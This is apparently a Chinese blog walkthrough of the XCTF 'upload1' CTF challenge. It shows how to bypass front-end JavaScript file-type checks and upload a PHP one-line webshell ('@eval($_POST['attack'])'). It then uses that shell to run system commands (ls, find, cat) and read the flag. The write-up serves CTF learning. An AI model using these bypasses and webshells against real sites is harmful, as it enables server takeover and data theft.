XCTF-攻防世界CTF平台-Web类——11、upload1(文件上传、前端校验)

最新推荐文章于 2024-07-20 21:28:14 发布
最新推荐文章于 2024-07-20 21:28:14 发布
阅读量4.9k 收藏 10
点赞数 3
分类专栏: # Bugku、XCTF-WEB类写题过程 文章标签: 前端 web安全 安全 javascript php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/onlyone_1314/article/details/121503130
版权

目录标题

打开题目地址:
在这里插入图片描述

是一个文件上传的题目
选择一个一句话脚本上传:
在这里插入图片描述

前端存在JS代码校验文件类型,如果上传的文件后缀不是jpg和png,就会让上传按钮变得不使能:
在这里插入图片描述

要绕过前端的JS代码校验,常见的方法有:

(1)把οnchange="check();去掉

可以直接把οnchange="check();去掉,这样提交文件的时候就不会校验文件类型了。
F12查看页面代码:
在这里插入图片描述

删除οnchange="check();
在这里插入图片描述

结果发现选择了1.php文件之后,依然校验了文件后缀,让上传按钮变得不使能了:
在这里插入图片描述
但是在火狐浏览器删除οnchange="check();之后,却已经可以上传1.php文件了:
在这里插入图片描述

点击上传:
在这里插入图片描述

上传成功!

所以谷歌浏览器可能需要把整段JS代码都删掉,那我们干脆直接选择了1.php文件之后:
在这里插入图片描述

把上传按钮的disable属性去掉:
在这里插入图片描述

之后上传按钮就变得使能了,上传1.php:
在这里插入图片描述

上传成功!

(2)禁用浏览器的JS脚本运行

禁用浏览器的JS脚本运行,这样提交文件的时候就也不会校验文件类型了。
例如谷歌浏览器,在高级设置->隐私设置和安全性->JavaScript中,或者直接输入网址:

chrome://settings/content/javascript

在这里插入图片描述

不允许网站使用 JavaScript,可以暂时设置所有网站或者指定目标网址不能执行JavaScript脚本。
再选择1.php:
在这里插入图片描述

没有触发js脚本,上传按钮依旧使能,可以直接上传:
在这里插入图片描述

上传成功!

(3)Burp Suite抓包修改文件后缀名

先将,从浏览器选择11.jpg上传,然后Burp Suite抓包:
在这里插入图片描述

之后发送到重发器,将11.jpg改回11.php然后再发送:
在这里插入图片描述

也能成功上传。

POST方法一句话木马

<?php @eval($_POST['attack']); ?>

一句话木马的原理,通过php的eval函数执行由POST方式提交的attack变量的值,就是把attack=xxx 字符串当成php语句执行。这里的attack只是变量名,也可以改成其他的。
这个一句话木马需要用POST方式提交attack变量的值:

attack=phpinfo();

在这里插入图片描述

phpinfo()输出PHP当前状态的大量信息,包含了 PHP 编译选项、启用的扩展、PHP 版本、服务器信息和环境变量(如果编译为一个模块的话)、PHP环境变量、操作系统版本信息、path 变量、配置选项的本地值和主值、HTTP 头和PHP授权信息(License)。
之后我们可以执行查看当前目录下文件的命令:

attack=system('ls');

在这里插入图片描述

之后搜索flag文件:

attack=system('find / -name "flag*" ');

在这里插入图片描述

发现在/var/www/html/flag.php路径下有flag:
查看flag文件:

attack=system('cat /var/www/html/flag.php');

在这里插入图片描述

返回的flag.php文件内容在注释中,得到flag:cyberpeace{96e8b99eee701e52288e986eb8ea3f2c}

GET方法一句话木马

<?php @eval($_GET['attack']); ?>

一句话木马也可以通过GET方式提交attack变量的值。
上传一个2.php
在这里插入图片描述

之后连接:

http://111.200.241.244:54118/upload/1637599461.2.php?attack=system('cat /var/www/html/flag.php');

在这里插入图片描述

得到flag:cyberpeace{96e8b99eee701e52288e986eb8ea3f2c}

蚁剑连接

此外也可以用蚁剑连接:

<?php @eval($_POST['attack']); ?>

连接第一个POST方式的一句话木马:
在这里插入图片描述

之后就可以使用虚拟终端、查看文件管理、进行数据库操作等:
在这里插入图片描述

找到flag.php:
在这里插入图片描述

得到flag:cyberpeace{96e8b99eee701e52288e986eb8ea3f2c}

大灬白
关注
专栏目录
【网络安全 | CTF攻防世界 upload1 解题详析
等风来
05-24 4655
该代码通过扩展 Array 原型对象添加了一个名为 contains 的函数,用于判断一个对象是否在数组中,主要应用于判断上传文件的扩展名是否属于指定的图片格式,这里是 [‘jpg’,‘png’]这段代码的作用是检查上传文件的扩展名是否符合要求,如果是图片格式(jpg或png),则启用提交按钮,否则禁用提交按钮并弹出提示消息。若文件上传成功,则在上传路径对应的页面会输出。考察文件上传,具体原理及姿势不再赘述。抓包,修改filename文件后缀为。无Error回显,说明木马上传成功。
XCTF-攻防世界-密码学crypto-新手练习区-writeup
热门推荐
Ryannn_的博客
10-23 1万+
目录 0x00 base64 0x01 Caesar 0x02 Morse 0x03 Railfence 0x04 转轮机加密 0x05 easy_RSA 0x06 Normal_RSA 0x07 不仅仅是Morse 0x08 混合编码 0x09 easychallenge 0x0A easy_ECC 0x0B 幂数加密 0x00 base64 元宵节灯谜是一种古老的传...
攻防世界CTF题:upload1
Aixwei的博客
04-11 1059
发现这里有个onchange事件,大概写了个前端的文件check,那我们在前端把它删掉再上传文件试试。发现了 disabled属性,我们把它删掉之后上传按键可以点击了,此时点击上传,可以看到上传成功。细看当前页面,发现上传按钮灰掉了,但是上传的文件还保留在前端并没有删除,此时再查看前端代码,最后,通过上传图片型的木马,再通过bp抓包修改后缀绕过前端验证也是可以的成功。发现这里弹窗提示你要上传图片,可能是前端验证文件格式,所以先看一下源代码,我们先正常上传一句话木马,被拦截后点击确定,
XCTF-upload
aaeoj8957的博客
07-10 192
这道题的话,看了一下是RCTF-2015的原题。。。。可是这也太难了吧QAQ,文件名作为注入点可也是太秀了,害的我一直以为是文件上传QAQ,并且这道题的坑还不少,就是注入时的输出只能为10进制。。。。。这也就是说还需要你进行一下进制转换。。。 还有这里面将select和from过滤了一次。。。你还需要双写,,,哎。心累 一遍遍的fuzz的话,不知道要弄到什么时候。幸...
CTF-web题 一句话木马
最新发布
2302_80276789的博客
07-20 263
php标签为框架,里面的东西七主要作用,@符号是指我们@谁,使不报错,eval是将后面里面的当作php代码执行,$_post[‘a’]为接受psot方法 来接受a这个参数a.可以将a传入system,系统命令等,就可以实现控制作用。链接密码为参数a,进行链接,然后添加。双击进入,此时服务器已经被我们控制。我们便可以查看服务器的文件,我们可以在根目录下找到一个flag文件,点击进去,就可以得到flag。接下来使用中国蚁剑进行连接,打开之后,复制网址,点击右键,添加数据,将url添加进来。
攻防世界XCTFupload1
末初的CSDN博客
03-08 763
前端验证,直接删除掉这段代码,或者浏览器关闭JS,然后上传webshell即可 啥函数都没有禁用,直接找flag cat了flag.php但是没有回显,可能是一个变量,查看一下源码 ...
CTFupload1
天天学安全专属博客
11-18 404
攻防世界 upload1
WEB漏洞攻防 - 文件上传漏洞 - CTF - [CTF2020 新生赛] Upload 1
易编橙 · 终身成长社群,相遇已是上上签!
09-03 458
关卡: WEB - [CTF2020 新生赛]Upload 1
XCTF-RE】新手练习区-Hello, CTF.exe
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/gisa2b
pwn1 babystack [XCTF-PWN][高手进阶区]CTF writeup攻防世界题解系列19
重新启程
12-25 1656
题目地址:pwn1 babystack 已经到了高手进阶区的第八题了,已经渐入佳境了。哈哈! 废话不说,看看题目先 厦门邀请赛的题目,还是2星难度,那就开工了。 管理检查一下保护机制: [*] '/ctf/work/python/pwn1/babystack' Arch: amd64-64-little RELRO: Full RELRO Stac...
6-XCTF-Web-unfinish(二次注入)
cquptcqupt的博客
08-17 321
这里写目录标题一、二级目录三级目录 一、 二级目录 三级目录
get-shell [XCTF-PWN]CTF writeup系列1
重新启程
12-19 1926
因为做vulhub靶场Serial2,在最后一步用到了rop技术,所以就顺便把自己学习pwn的过程做下记录。 今天做的ctf题目是pwn新手训练场的第一题get-shell。 首先我们点击获取在线场景 然后我们就可以看到,这个题目给我们提供了一个服务器端口,我们可以通过telnet连接这个端口 我们可以看到 这个端口是可以直接连接的,这道题目,因为没有回显文件,所以就看不到什么...
攻防世界XCTFupload
末初的CSDN博客
03-08 870
这里有个注册登入,迷惑行为,漏洞不在这里 这题比较意外,不是上传题是sql注入而且还是文件名的SQL注入, 因为回显的只是文件名,然后它存入数据库的也可能是文件名,既然连接了数据库就可能存在注入漏洞。然后就能想到可能是文件名sql注入。 任何与数据库发生连接交互的地方都可能存在SQL注入! 然后就开始构造文件名的payload,首先介绍几个函数。 conv(N,from_base,to_ba...
XCTF-高手进阶区:upload1
1stPeak's Blog
02-29 803
1、访问题目 2、测试 说明存在前端过滤,只能上传图片文件 3、解决方法:先将含有一句话木马的1.php后缀修改为x.jpg来绕过前端认证,同时使用bp抓包,再修改后缀为php,从而可以使用蚁剑连接 当然,这里可以使用URL利用 注:这里直接访问不会显示,因为是php代码,没有输出,所以需要查看网页源代码 ...
攻防世界upload1
金 帛的博客
04-24 2362
攻防世界文件上传
攻防世界-upload1
m0_49025459的博客
12-29 304
访问题目场景查看一下网页源代码。
攻防世界upload1
weixin_52268949的博客
01-30 1020
upload1 进入环境就一个上传,我们先上传一个普通的木马文件看看 木马内容 <?php @eval($_POST["cmd"]); ?> 估计是前端校验我们查看源码 只能上传jpg和png图片,那我们将木马后缀改为.jpg然后使用bp抓包并把后缀改为.php即可 然后访问木马文件执行指令即可 执行后查看源码便发现flag ...
ctf upload1
07-28
根据提供的引用内容,可以得知ctf upload1是一个CTF比赛中的一个上传功能。通过上传文件,可以执行一句话木马来获取flag。具体步骤如下: 1. 首先,需要找到一句话木马的代码。根据引用\[1\]中的内容,可以得到一句话木马的代码为`<?php @eval($_GET\['attack'\]); ?>`。 2. 接下来,需要构造一个GET请求,将一句话木马的代码作为参数传递给服务器。根据引用\[2\]中的内容,可以得到请求的URL为`http://111.200.241.244:54118/upload/1637599461.2.php?attack=system('cat /var/www/html/flag.php');`。这个请求会执行`system('cat /var/www/html/flag.php')`命令,将flag.php文件的内容返回。 3. 最后,发送该请求,即可获取flag。请注意,这个请求需要在合适的环境下进行,且仅供学习和研究使用。 总结起来,ctf upload1是一个上传功能,通过上传文件执行一句话木马来获取flag。具体步骤是构造一个GET请求,将一句话木马的代码作为参数传递给服务器,然后执行相应的命令获取flag。 #### 引用[.reference_title] - *1* *2* *3* [XCTF-攻防世界CTF平台-Web——11upload1(文件上传前端校验)](https://blog.csdn.net/Onlyone_1314/article/details/121503130)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值